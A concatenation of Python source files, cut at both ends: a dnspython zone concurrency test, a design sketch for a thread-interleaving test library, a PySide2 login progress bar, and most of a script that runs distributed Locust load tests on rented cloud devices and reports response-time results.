# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
|
planned_api.py
|
import unittest
import threading
from threadmock import backtrack_test, whitebox_test, random_test
@threadmock.defaults(max_depth=10, runs=1000)
class PlannedAPIExamples__General(unittest.TestCase):
@random_test(runs=5000)
def test_random(self):
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
@random_test # default value of 'runs' argument is used
def test_random_with_defaults(self):
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
# to consider: also have a possiblity of switch_when for random tests
@backtrack_test(max_depth=8)
def test_backtrack_catch_all(self, s):
s.switch_when(...)
s.switch_when(...)
s.switch_when(...)
s.switch_when(...)
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
@backtrack_test # default value of 'max_depth' argument is used
def test_backtrack_capture(self, s):
# breakpoint constructor takes a predicate as arguments
b1 = Breakpoint(...)
b2 = Breakpoint(...)
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
# t1, t2 are instances of threading.Thread
# Breakpoint.capture_thread() is a context manager equivalent to
# executing Breakpoint.acquire() and Breakpoint.release()
with b1.capture_thread() as t1:
t1.switch_when(...)
# Thread.switch_when(...) takes a predicate as arguments. When the
# thread on which switch_when() was called has processor and given
# predicate is true, a context switch from this thread is allowed
# to occur.
# @backtrack_test decorator checks all possible thread interleavings
# given that context switches are only allowed in moments specified
# by previous switch_when calls.
t1.switch_when(...)
t2 = b2.acquire()
t2.switch_when(...)
t2.switch_when(...)
t2.switch_when(...)
# Breakpoint.acquire() waits until any of running threads match
# breakpoint predicate/specification and pauses this thread.
# For the thread to continue execution,
# Breakpoint.release() has to be called
# NOTE: if any of running threads match breakpoint condition _before_
# Breakpoint.acquire() (or Breakpoint.capture_thread()) is called,
# the thread is paused anyway
b2.release()
# s is an instance of threadmock.State
# s.switch_when(...) is equivalent to calling this method on every
# thread (including threads that will be created in the future - this of
# course applies only to the end of function currently decorated with
# @backtrack_test)
s.switch_when(...)
SUT.wait()
self.assertSomething(SUT)
@backtrack_test
def test_backtrack_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
# NOTE: the switch_when stuff has to be called before the threads
# are started; calling it on a running thread will raise an exception
# this applies to [switch_when, run_until, run_while, throw] methods
# they can only be called on a thread that is not yet started or
# on a thread that is blocked on some breakpoint.
# calling switch_when on a non-started thread will not change thread's
# status; calling run_until, run_while or throw on a non-started thread
# will change it's status to waiting-on-breakpoint
t1.switch_when(...)
t1.switch_when(...)
t2.switch_when(...)
t2.switch_when(...)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertSomething(SUT)
@whitebox_test
def test_whitebox_capture(self, s):
b1 = Breakpoint(...)
b2 = Breakpoint(...)
SUT = SystemUnderTest()
SUT.start_bunch_of_threads()
t1 = b1.acquire()
t2 = b2.acquire()
t1.run_until(...)
self.assertSomething(SUT)
t2.run_until(...)
# s.locals, s.func, s.cls, s.line are available here and store
# state of the last non-main thread that had the processor
# here it would be t2
self.assertSomething(s.locals.some_variable)
self.assertSomething(s.func)
self.assertSomething(s.line)
t1.run_while(...)
self.assertSomething(SUT)
t2.run_until(...)
b1.release()
b2.release()
t1.join()
t2.join()
self.assertSomething(SUT)
@whitebox_test
def test_whitebox_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
# NOTE: do not invoke Thread.start() in here!
# because if you do so, control will reach these run_until() methods
# after these (already started) threads were running for a while
# probably already been in these points which conditions given to
# run_until(...) were supposed to catch
# this is why any invocation of run_until or run_while on a running
# thread will raise an exception; they can only be invoked on a
# non-started or waiting-on-breakpoint threads.
# IMPLEMENTATION NOTE: calling run_until() on a non-started thread
# places an implicit helper breakpoint on that thread and then starts it
# so that to allow threading.Thread.start() code to execute
# threading.Thread.start() waits for some threading.Event that is
# signalled when the new thread has finished it's initialization
# so run_until or run_while or throw on a non-started thread changes
# it's status to waiting-on-breakpoint where breakpoint is not known to
# the user so that user is left with run_until stuff.
# TO CONSIDER: some way for the user to access this internal breakpoint
t1.run_until(...)
self.assertSomething(SUT)
t2.run_until(...)
t1.run_until(...)
self.assertSomething(SUT)
t1.run_until(...)
t2.run_while(...)
# instead of .join() - these threads not running, so cannot join()
# join on such threads will raise an exception explaining these concepts
# and suggesting using run_until(is_alive=False) or calling .release()
# on a corresponding breakpoint before
t1.run_until(is_alive=False)
t2.run_until(is_alive=False)
self.assertSomething(SUT)
@threadmock.defaults(max_depth=10, runs=1000)
class PlannedAPIExamples__Predicates(unittest.TestCase):
# predicates here are illustrated using Thread.run_until
# they work the same way when used as arguments to:
# Breakpoint.__init__, Thread.run_while, Thread.switch_when,
# threadmock.State.switch_when, threadmock.State.add_invariant
@whitebox_test
def test_whitebox_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
# s is an instance of threadmock.State
# add an invariant to be checked before each executed line
# of code (implemented as a sys.settrace hack). This is most useful in
# random_test and backtrack_test though
s.add_invariant(lambda: SUT.check_invariant())
# the most basic form of a predicate is a lambda without arguments
# if the lambda raises a LocalVariableAttributeError, it is treated as
# if the predicate returned false. the below example matches any
# function that has a local variable named 'a' that has value 5
t1.run_until(lambda: s.locals.a == 5)
# the following 2 lines are equivalent and run the t1 thread until
# it will block on any synchronization primitive (all of them are
# implemented using a thread.allocate_lock() anyway)
t1.run_until(is_blocked=True)
t1.run_until(lambda: t1 in s.blocked_threads)
# assert that t1 waits on some particular resource
# SUT.some_resource can be any of the synchronization primitives found
# in stdlib's threading module
self.assertTrue(t1 in s.waiting_for[SUT.some_resource])
# run thread t2 until it releases the resource that t1 waits for.
# the run_until method will raise an exception if the thread had
# finished before the specified condition was met
t2.run_until(lambda: t1 not in s.blocked_threads)
# runs until t1 enters a function named 'somefunction'
# a function object cannot be used here because of implementation issues
# TO CONSIDER: allow using a function object here and check equivalence
# of underlying code objects...
t1.run_until(func='somefunction')
t1.run_until(lambda: s.func == 'somefunction')
# the following 2 are equivalent and run until next assignment
# instruction; s.line is a line of code stripped of leading and
# trailing whitespace
t2.run_until(lambda: ' = ' in s.line, func='otherfunction')
t2.run_until(lambda: ' = ' in s.line and s.func == 'otherfunction')
t1.run_until(line='some_object.some_method()')
t1.run_until(lambda: s.line == 'some_object.some_method()')
# runs until the thread finishes execution
t1.run_until(is_alive=False)
t1.run_until(lambda: t1 not in s.alive_threads)
### PROBLEMS:
## How to break instructions of the form: a += b ?
# some solution from the internet:
# http://nedbatchelder.com/blog/200804/wicked_hack_python_bytecode_tracing.html
# a patch decorator can be made that will replace requested function's code
# (f.__code__) so that fake line numbers (pretending that each bytecode
# instruction is in a separate line) are in the lnotab attribute, so that the
# sys.trace is invoked before each bytecode instruction instead of before each
# line
## Check if threading.Thread does not swallow exceptions raised in this thread
# and how exception handling in greenlets works
|
ProgressBar.py
|
# -*- coding: utf-8 -*-
# @Time : 2020/8/2 18:03
from __init__ import *
import sys,time
from PySide2.QtCore import Signal,QObject,Slot
from ui2py.Progress import *
class Bar(QObject):
progress_update = Signal(int)
def __init__(self,q):
super().__init__()
# print("process1.kill()2\n")
# 使用Signal信号在新线程中修改主线程中的内容
self.progress_update.connect(self.setProgress)
# 用于后续登陆
self.flag_login = 0
# 将登陆成功标识,存入队列,供后续使用
self.q = q
self.ui = QUiLoader().load('../UI/Progress.ui')
self.ui.setWindowTitle('正在登录')
self.ui.show()
self.AnimalBar()
# self.ui = Ui_ProgressBar()
# self.ui.setupUi(self)
# self.show()
# self.ChangeValue()
def ChangeValue(self):
# self.bankLock.acquire()
for i in range(0, 101, 10):
# 这里创建发射信号,等待信号处理函数执行完需要花费时间,需要等待才会看到修改后进度条的值
self.progress_update.emit(i)
time.sleep(0.5)
# self.bankLock.release()
def AnimalBar(self):
thread1 = Thread(target=self.ChangeValue)
thread1.start()
# 处理进度的slot函数
@Slot(int)
def setProgress(self,value):
self.ui.LoginProgress.setValue(value)
if self.ui.LoginProgress.value() == 100:
self.flag_login = 1
self.q.put(self.flag_login)
# print("Login Successful")
# QMessageBox.information(self.ui, '登录成功', "正在准备界面,请稍等...")
# self.deleteLater()
self.ui.close()
def BarInstance(q):
# print("{0}BarInstance Creat ok()\n".format(q))
app = QApplication(sys.argv)
app.setWindowIcon(QIcon('../UI/Bank.ico'))
bar = Bar(q)
bar.AnimalBar()
sys.exit(app.exec_())
if __name__ == '__main__':
q1 = mp.Queue(10)
app = QApplication(sys.argv)
app.setWindowIcon(QIcon('../UI/Bank.ico'))
bar = Bar(q1)
sys.exit(app.exec_())
# 重新开启进程,运行进度条界面
# process1 = mp.Process(target=BarInstance, args=(q1,))
# process1.start()
# process1.join()
# print(q1.get())
|
runDistributedLoadtest.py
|
#!/usr/bin/env python3
"""
does distributed load testing using Locust on NCS instances
"""
# standard library modules
import argparse
import contextlib
import getpass
import json
import logging
import os
import socket
import signal
import subprocess
import sys
import threading
import time
import uuid
# third-party module(s)
import requests
# neocortix modules
import analyzeLtStats
import extractAnsibleRecap
import ncscli.ncs as ncs
# try:
# import ncs
# except ImportError:
# # set system and python paths for default places, since path seems to be not set properly
# ncscliPath = os.path.expanduser('~/ncscli/ncscli')
# sys.path.append( ncscliPath )
# os.environ["PATH"] += os.pathsep + ncscliPath
# import ncs
logger = logging.getLogger(__name__)
# possible place for globals is this class's attributes
class g_:
signaled = False
class SigTerm(BaseException):
#logger.warning( 'unsupported SigTerm exception created')
pass
def sigtermHandler( sig, frame ):
g_.signaled = True
logger.warning( 'SIGTERM received; will try to shut down gracefully' )
#raise SigTerm()
def sigtermSignaled():
return g_.signaled
def boolArg( v ):
'''use with ArgumentParser add_argument for (case-insensitive) boolean arg'''
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def scriptDirPath():
'''returns the absolute path to the directory containing this script'''
return os.path.dirname(os.path.realpath(__file__))
def loadSshPubKey():
pubKeyFilePath = os.path.expanduser( '~/.ssh/id_rsa.pub' )
with open( pubKeyFilePath ) as inFile:
contents = inFile.read()
return contents
# some port-reservation code adapted from https://github.com/Yelp/ephemeral-port-reserve
def preopen(ip, port):
''' open socket with SO_REUSEADDR and listen on it'''
port = int(port)
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#logger.info( 'binding ip %s port %d', ip, port )
s.bind((ip, port))
# the connect below deadlocks on kernel >= 4.4.0 unless this arg is greater than zero
s.listen(1)
return s
def preclose(s):
sockname = s.getsockname()
# get the port into a TIME_WAIT state
with contextlib.closing(socket.socket()) as s2:
s2.connect(sockname)
s.accept()
s.close()
# return sockname[1]
def preopenPorts( startPort, maxPort, nPorts ):
sockets = []
gotPorts = False
while not gotPorts:
try:
for port in range( startPort, startPort+nPorts ):
logger.info( 'preopening port %d', port )
sock = preopen( '127.0.0.1', port )
sockets.append( sock )
gotPorts = True
except OSError as exc:
logger.warning( 'got exception (%s) %s', type(exc), exc, exc_info=False )
startPort += nPorts
sockets = []
if startPort >= maxPort:
break
results = {}
if not gotPorts:
logger.error( 'search for available ports exceeded maxPort (%d)', maxPort )
return results
results['ports'] = list( range( startPort, startPort+nPorts ) )
results['sockets'] = sockets
return results
def launchInstances_old( authToken, nInstances, sshClientKeyName, filtersJson=None ):
results = {}
# call ncs launch via command-line
filtersArg = "--filter '" + filtersJson + "'" if filtersJson else " "
cmd = 'ncs.py sc --authToken %s launch --count %d %s --sshClientKeyName %s --json > launched.json' % \
(authToken, nInstances, filtersArg, sshClientKeyName )
try:
subprocess.check_call( cmd, shell=True, stdout=sys.stderr )
except subprocess.CalledProcessError as exc:
logger.error( 'CalledProcessError %s', exc.output )
#raise # TODO raise a more helpful specific type of error
results['cloudServerErrorCode'] = exc.returncode
results['instancesAllocated'] = []
return results
def launchInstances( authToken, nInstances, sshClientKeyName,
filtersJson=None, encryptFiles=True ):
returnCode = 13
# call ncs launch via command-line
#filtersArg = "--filter '" + filtersJson + "'" if filtersJson else " "
#cmd = 'ncs.py sc --authToken %s launch --count %d %s --sshClientKeyName %s --json > launched.json' % \
# (authToken, nInstances, filtersArg, sshClientKeyName )
cmd = [
'ncs.py', 'sc', '--authToken', authToken, 'launch',
'--encryptFiles', str(encryptFiles),
'--count', str(nInstances), # filtersArg,
'--sshClientKeyName', sshClientKeyName, '--json'
]
if filtersJson:
cmd.extend( ['--filter', filtersJson] )
#logger.debug( 'cmd: %s', cmd )
try:
outFile = open('launched.json','w' )
#proc = subprocess.Popen( cmd, shell=True )
proc = subprocess.Popen( cmd, stdout=outFile )
while True:
#logger.debug( 'polling ncs')
proc.poll() # sets proc.returncode
if proc.returncode != None:
break
if sigtermSignaled():
logger.info( 'signaling ncs')
proc.send_signal( signal.SIGTERM )
try:
logger.info( 'waiting ncs')
proc.wait(timeout=60)
if proc.returncode:
logger.warning( 'ncs return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'ncs launch did not terminate in time' )
time.sleep( 1 )
returnCode = proc.returncode
if outFile:
outFile.close()
except Exception as exc:
logger.error( 'exception while launching instances (%s) %s', type(exc), exc, exc_info=True )
returnCode = 99
return returnCode
def terminateThese( authToken, inRecs ):
logger.info( 'to terminate %d instances', len(inRecs) )
iids = [inRec['instanceId'] for inRec in inRecs]
ncs.terminateInstances( authToken, iids )
def jsonToInv():
cmd = 'cat launched.json | jsonToInv.py > launched.inv'
try:
subprocess.check_call( cmd, shell=True, stdout=sys.stderr )
except subprocess.CalledProcessError as exc:
logger.error( '%s', exc.output )
raise # TODO raise a more helpful specific type of error
def installPrereqs():
invFilePath = 'launched.inv'
tempFilePath = 'data/installPrereqsDeb.temp'
scriptDirPath = os.path.dirname(os.path.realpath(__file__))
jsonToInv()
logger.info( 'calling installPrereqsQuicker.yml' )
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ANSIBLE_DISPLAY_FAILED_STDERR=yes ansible-playbook %s/installPrereqsQuicker.yml -i %s | tee data/installPrereqsDeb.temp; wc installed.inv' \
% (scriptDirPath, invFilePath)
try:
exitCode = subprocess.call( cmd, shell=True, stdout=subprocess.DEVNULL )
if exitCode:
logger.warning( 'ansible-playbook installPrereqs returned exit code %d', exitCode )
except subprocess.CalledProcessError as exc:
logger.error( '%s', exc.output )
raise # TODO raise a more helpful specific type of error
installerRecap = extractAnsibleRecap.extractRecap( tempFilePath )
wellInstalled = extractAnsibleRecap.getGoodInstances( installerRecap )
sys.stderr.flush()
return wellInstalled
def startWorkers( victimUrl, masterHost, dataPorts ):
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook %s/startWorkers.yml -e "victimUrl=%s masterHost=%s masterPort=%s" -i installed.inv |tee data/startWorkers.out' \
% (scriptDirPath(), victimUrl, masterHost, dataPorts[0])
try:
subprocess.check_call( cmd, shell=True, stdout=subprocess.DEVNULL )
except subprocess.CalledProcessError as exc:
logger.warning( 'startWorkers returnCode %d (%s)', exc.returncode, exc.output )
def killWorkerProcs():
logger.info( 'calling killWorkerProcs.yml' )
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook %s/killWorkerProcs.yml -i installed.inv' \
% (scriptDirPath())
try:
subprocess.check_call( cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL )
except subprocess.CalledProcessError as exc:
logger.info( 'exception from killWorkerProcs (return code %d)', exc.returncode )
def output_reader(proc):
for line in iter(proc.stdout.readline, b''):
print('Locust: {0}'.format(line.decode('utf-8')), end='', file=sys.stderr)
def startMaster( victimHostUrl, dataPorts, webPort ):
logger.info( 'calling runLocust.py' )
result = {}
cmd = [
'python3', '-u', scriptDirPath()+'/runLocust.py', '--host='+victimHostUrl,
'--heartbeat-liveness=30',
'--master-bind-port', str(dataPorts[0]), '--web-port', str(webPort),
'--master', '--loglevel', 'INFO', '-f', scriptDirPath()+'/master_locust.py'
]
try:
proc = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT )
result['proc'] = proc
t = threading.Thread(target=output_reader, args=(proc,))
result['thread'] = t
t.start()
except subprocess.CalledProcessError as exc:
# this section never runs because Popen does not raise this exception
logger.error( 'return code: %d %s', exc.returncode, exc.output )
raise # TODO raise a more helpful specific type of error
finally:
return result
def stopMaster( specs ):
logger.info( 'specs %s', specs )
proc = specs.get('proc')
if proc:
proc.terminate()
try:
proc.wait(timeout=5)
if proc.returncode:
logger.warning( 'runLocust return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'runLocust did not terminate in time' )
thread = specs.get('thread')
if thread:
thread.join()
def genXmlReport( wasGood ):
'''preliminary version generates "fake" junit-style xml'''
templateProlog = '''<?xml version="1.0" ?>
<testsuites>
<testsuite tests="1" errors="0" failures="%d" name="loadtests" >
<testcase classname="com.neocortix.loadtest" name="loadtest" time="1.0">
'''
templateFail = '''
<failure message="response time too high">Assertion failed</failure>
'''
templateEpilog = '''
</testcase>
</testsuite>
</testsuites>
'''
if wasGood:
return (templateProlog % 0) + templateEpilog
else:
return (templateProlog % 1) + templateFail + templateEpilog
def testsPass( args, loadTestStats ):
if loadTestStats.get('nReqsSatisfied', 0) <= 0:
return False
return loadTestStats.get('meanResponseTimeMs30', 99999) <= args.reqMsprMean
def conductLoadtest( masterUrl, nWorkersWanted, usersPerWorker,
startTimeLimit, susTime, stopWanted, nReqInstances, rampUpRate
):
logger.info( 'locals %s', locals() )
hatch_rate = rampUpRate if rampUpRate else nWorkersWanted # force it non-zero
if not masterUrl.endswith( '/' ):
masterUrl = masterUrl + '/'
if stopWanted:
logger.info( 'requesting stop via %s', masterUrl+'stop' )
resp = requests.get( masterUrl+'stop' )
logger.info( '%s', resp.json() )
startTime = time.time()
deadline = startTime + startTimeLimit
workersFound = False
while True:
if g_.signaled:
break
try:
reqUrl = masterUrl+'stats/requests'
resp = requests.get( reqUrl )
respJson = resp.json()
if 'slaves' in respJson:
workerData = respJson['slaves']
workersFound = len(workerData)
logger.info( '%d workers found', workersFound )
if workersFound >= nWorkersWanted:
break
if time.time() > deadline:
break
except Exception as exc:
logger.warning( 'exception (%s) %s', type(exc), exc )
time.sleep(1)
nGoodWorkers = 0
maxRps = 0
if workersFound:
url = masterUrl+'swarm'
nUsersWanted = nWorkersWanted * usersPerWorker
reqParams = {'locust_count': nUsersWanted,'hatch_rate': hatch_rate }
logger.info( 'swarming, count: %d, rate %.1f', nUsersWanted, hatch_rate )
resp = requests.post( url, data=reqParams )
if (resp.status_code < 200) or (resp.status_code >= 300):
logger.warning( 'error code from server (%s) %s', resp.status_code, resp.text )
logger.info( 'error url "%s"', url )
logger.info( 'monitoring for %d seconds', susTime )
deadline = time.time() + susTime
while time.time() <= deadline:
if g_.signaled:
break
try:
resp = requests.get( masterUrl+'stats/requests' )
respJson = resp.json()
rps = respJson['total_rps']
maxRps = max( maxRps, rps )
if 'slaves' in respJson:
workerData = respJson['slaves']
workersFound = len(workerData)
#logger.info( '%d workers found', workersFound )
nGoodWorkers = 0
nUsers = 0
# loop for each worker, getting actual number of users
for worker in workerData:
if worker['user_count'] > 0: # could check for >= usersPerWorker
nGoodWorkers += 1
nUsers += worker['user_count']
else:
logger.info( '%s %d %s',
worker['state'], worker['user_count'], worker['id'] )
logger.info( '%d workers found, %d working; %d simulated users',
workersFound, nGoodWorkers, nUsers )
except Exception as exc:
logger.warning( 'exception (%s) %s', type(exc), exc )
time.sleep(5)
# print summary
print( '%d of %d workers showed up, %d workers working at the end'
% (workersFound, nWorkersWanted, nGoodWorkers) )
# get final status of workers
resp = requests.get( masterUrl+'stats/requests' )
respJson = resp.json()
if stopWanted:
resp = requests.get( masterUrl+'stop' )
# save final status of workers as json
with open( 'data/locustWorkers.json', 'w' ) as jsonOutFile:
if 'slaves' in respJson:
workerData = respJson['slaves']
else:
workerData = []
json.dump( workerData, jsonOutFile, sort_keys=True, indent=2 )
print( '%d simulated users' % (respJson['user_count']) )
'''
if nReqInstances:
pctGood = 100 * nGoodWorkers / nReqInstances
print( '\n%d out of %d = %.0f%% success rate' % (nGoodWorkers, nReqInstances, pctGood ) )
'''
def executeLoadtest( targetHostUrl, htmlOutFileName='ltStats.html' ):
masterStarted = False
masterFailed = False
masterSpecs = None
loadTestStats = None
workersStarted = False
try:
if not sigtermSignaled():
startPort = args.startPort
maxPort=args.startPort+300
while (not masterStarted) and (not masterFailed):
if startPort >= maxPort:
logger.warning( 'startPort (%d) exceeding maxPort (%d)',
startPort, maxPort )
break
preopened = preopenPorts( startPort, maxPort, nPorts=3 )
reservedPorts = preopened['ports']
sockets = preopened['sockets']
dataPorts = reservedPorts[0:2]
webPort = reservedPorts[2]
for sock in sockets:
preclose( sock )
sockets = []
masterSpecs = startMaster( targetHostUrl, dataPorts, webPort )
if masterSpecs:
proc = masterSpecs['proc']
deadline = time.time() + 30
while time.time() < deadline:
proc.poll() # sets proc.returncode
if proc.returncode != None:
logger.warning( 'master gave returnCode %d', proc.returncode )
if proc.returncode == 98:
logger.info( 'locust tried to bind to a busy port')
# continue outer loop with higher port numbers
startPort += 3
else:
logger.error( 'locust gave an unexpected returnCode %d', proc.returncode )
# will break out of the outer loop
masterFailed = True
break
time.sleep(.5)
if proc.returncode == None:
masterStarted = True
if masterStarted and not sigtermSignaled():
logger.info( 'calling startWorkers' )
startWorkers( targetHostUrl, args.masterHost, dataPorts )
workersStarted = True
if masterStarted and not sigtermSignaled():
#time.sleep(5)
masterUrl = 'http://127.0.0.1:%d' % webPort
conductLoadtest( masterUrl, nWorkersWanted, args.usersPerWorker,
args.startTimeLimit, args.susTime,
stopWanted=True, nReqInstances=nWorkersWanted, rampUpRate=rampUpRate )
if masterStarted and masterSpecs:
time.sleep(5)
stopMaster( masterSpecs )
if workersStarted:
killWorkerProcs()
if masterStarted:
try:
time.sleep( 5 )
loadTestStats = analyzeLtStats.reportStats(dataDirPath, htmlOutFileName)
except Exception as exc:
logger.warning( 'got exception from analyzeLtStats (%s) %s',
type(exc), exc, exc_info=False )
plottingWanted = True
if plottingWanted:
try:
temp = analyzeLtStats.temporallyIntegrateLocustStats(
dataDirPath+'/locustStats.csv' )
analyzeLtStats.plotIntegratedStats( temp,
dataDirPath+'/integratedPerf.png' )
except Exception as exc:
logger.warning( 'got exception from integrating plotting stats (%s) %s',
type(exc), exc, exc_info=False )
# extended plotting using the boss's code
try:
cmd = [
scriptDirPath()+'/plotLocustAnalysis.py',
'--launchedFilePath', launchedJsonFilePath,
'--mapFilePath', scriptDirPath()+'/WorldCountryBoundaries.csv',
'--outDirPath', dataDirPath,
'--statsFilePath', dataDirPath+'/locustStats.csv'
]
plottingRc = subprocess.call( cmd, stdout=sys.stderr, stderr=subprocess.STDOUT )
if plottingRc:
logger.warning( 'plotLocustAnalysis returned RC %d', plottingRc )
except Exception as exc:
logger.warning( 'got exception from extended plotting (%s) %s',
type(exc), exc, exc_info=False )
except KeyboardInterrupt:
logger.warning( '(ctrl-c) received, will shutdown gracefully' )
if workersStarted:
killWorkerProcs()
if masterStarted and masterSpecs:
stopMaster( masterSpecs )
raise
except Exception as exc:
logger.warning( 'an exception occurred (%s); will try to shutdown gracefully', type(exc) )
if workersStarted:
killWorkerProcs()
if masterStarted and masterSpecs:
stopMaster( masterSpecs )
raise
return loadTestStats
if __name__ == "__main__":
# configure logger formatting
logFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'
logDateFmt = '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )
logging.basicConfig(format=logFmt, datefmt=logDateFmt)
ncs.logger.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
logger.debug('the logger is configured')
ap = argparse.ArgumentParser( description=__doc__, fromfile_prefix_chars='@', formatter_class=argparse.ArgumentDefaultsHelpFormatter )
ap.add_argument( 'victimHostUrl', help='url of the host to target as victim' )
ap.add_argument( 'masterHost', help='hostname or ip addr of the Locust master' )
ap.add_argument( '--authToken', required=True, help='the NCS authorization token to use' )
ap.add_argument( '--altTargetHostUrl', help='an alternative target host URL for comparison' )
ap.add_argument( '--filter', help='json to filter instances for launch' )
ap.add_argument( '--launch', type=boolArg, default=True, help='to launch and terminate instances' )
ap.add_argument( '--nWorkers', type=int, default=1, help='the # of worker instances to launch (or zero for all available)' )
ap.add_argument( '--rampUpRate', type=float, default=0, help='# of simulated users to start per second (overall)' )
ap.add_argument( '--sshClientKeyName', help='the name of the uploaded ssh client key to use (default is random)' )
ap.add_argument( '--startPort', type=int, default=30000, help='a starting port number to listen on' )
ap.add_argument( '--targetUris', nargs='*', help='list of URIs to target' )
ap.add_argument( '--usersPerWorker', type=int, default=35, help='# of simulated users per worker' )
ap.add_argument( '--startTimeLimit', type=int, default=30, help='time to wait for startup of workers (in seconds)' )
ap.add_argument( '--susTime', type=int, default=10, help='time to sustain the test after startup (in seconds)' )
ap.add_argument( '--reqMsprMean', type=float, default=1000, help='required ms per response' )
ap.add_argument( '--testId', help='to identify this test' )
args = ap.parse_args()
argsToSave = vars(args).copy()
del argsToSave['authToken']
signal.signal( signal.SIGTERM, sigtermHandler )
#logger.info( '--filter arg <%s>', args.filter )
dataDirPath = 'data'
os.makedirs( dataDirPath, exist_ok=True )
launchedJsonFilePath = 'launched.json'
argsFilePath = os.path.join( dataDirPath, 'runDistributedLoadtest_args.json' )
with open( argsFilePath, 'w' ) as argsFile:
json.dump( argsToSave, argsFile, indent=2 )
xmlReportFilePath = dataDirPath + '/testResults.xml'
if os.path.isfile( xmlReportFilePath ):
try:
# delete old file
os.remove( xmlReportFilePath )
except Exception as exc:
logger.warning( 'exception while deleting old xml report file (%s) %s', type(exc), exc, exc_info=False )
launchWanted = args.launch
rampUpRate = args.rampUpRate
if not rampUpRate:
rampUpRate = args.nWorkers
os.environ['ANSIBLE_CONFIG'] = os.path.join( scriptDirPath(), 'ansible.cfg' )
#logger.info( 'ANSIBLE_CONFIG: %s', os.getenv('ANSIBLE_CONFIG') )
# check whether the victimHost is available
try:
resp = requests.head( args.victimHostUrl )
if (resp.status_code < 200) or (resp.status_code >= 400):
logger.error( 'got response %d from target host %s',
resp.status_code, args.victimHostUrl )
sys.exit(1)
except Exception as exc:
logger.warning( 'could not access target host %s',args.victimHostUrl )
logger.error( 'got exception %s', exc )
sys.exit(1)
# check whether the altTargetHostUrl, if any, is available
if args.altTargetHostUrl:
try:
resp = requests.head( args.altTargetHostUrl )
if (resp.status_code < 200) or (resp.status_code >= 400):
logger.error( 'got response %d from alt target host %s',
resp.status_code, args.altTargetHostUrl )
sys.exit(1)
except Exception as exc:
logger.warning( 'could not access alt target host %s',args.altTargetHostUrl )
logger.error( 'got exception %s', exc )
sys.exit(1)
nWorkersWanted = args.nWorkers
if launchWanted:
# overwrite the launchedJson file as empty list, so we won't have problems with stale contents
with open( launchedJsonFilePath, 'w' ) as outFile:
json.dump( [], outFile )
loadTestStats = None
try:
masterSpecs = None
if launchWanted:
nAvail = ncs.getAvailableDeviceCount( args.authToken, filtersJson=args.filter )
if nWorkersWanted > (nAvail + 5):
logger.error( 'not enough devices available (%d requested)', nWorkersWanted )
sys.exit(1)
if nWorkersWanted == 0:
logger.info( '%d devices available to launch', nAvail )
nWorkersWanted = nAvail
if args.sshClientKeyName:
sshClientKeyName = args.sshClientKeyName
else:
keyContents = loadSshPubKey().strip()
#sshClientKeyName = 'loadtest_%s@%s' % (getpass.getuser(), socket.gethostname())
randomPart = str( uuid.uuid4() )[0:13]
#keyContents += ' #' + randomPart
sshClientKeyName = 'loadtest_%s' % (randomPart)
respCode = ncs.uploadSshClientKey( args.authToken, sshClientKeyName, keyContents )
if respCode < 200 or respCode >= 300:
logger.warning( 'ncs.uploadSshClientKey returned %s', respCode )
sys.exit( 'could not upload SSH client key')
#TODO handle error from launchInstances
rc = launchInstances( args.authToken, nWorkersWanted, sshClientKeyName, filtersJson=args.filter )
if rc:
logger.debug( 'launchInstances returned %d', rc )
# delete sshClientKey only if we just uploaded it
if sshClientKeyName != args.sshClientKeyName:
logger.info( 'deleting sshClientKey %s', sshClientKeyName)
ncs.deleteSshClientKey( args.authToken, sshClientKeyName )
if rc:
logger.warning( 'launchInstances returned %d', rc )
wellInstalled = []
if rc == 0 and not sigtermSignaled():
wellInstalled = installPrereqs()
logger.info( 'installPrereqs succeeded on %d instances', len( wellInstalled ))
if len( wellInstalled ):
if args.targetUris:
targetUriFilePath = dataDirPath + '/targetUris.json'
with open( targetUriFilePath, 'w' ) as outFile:
json.dump( args.targetUris, outFile, indent=1 )
#uploadTargetUris( targetUriFilePath )
# do all the steps of the actual loadtest (the first of 2 if doing a comparison)
loadTestStats = executeLoadtest( args.victimHostUrl )
logger.info ( 'loadTestStatsA: %s', loadTestStats )
xml = genXmlReport( testsPass( args, loadTestStats ) )
with open( xmlReportFilePath, 'w' ) as outFile:
outFile.write( xml )
if args.altTargetHostUrl:
# rename output files for the primary target
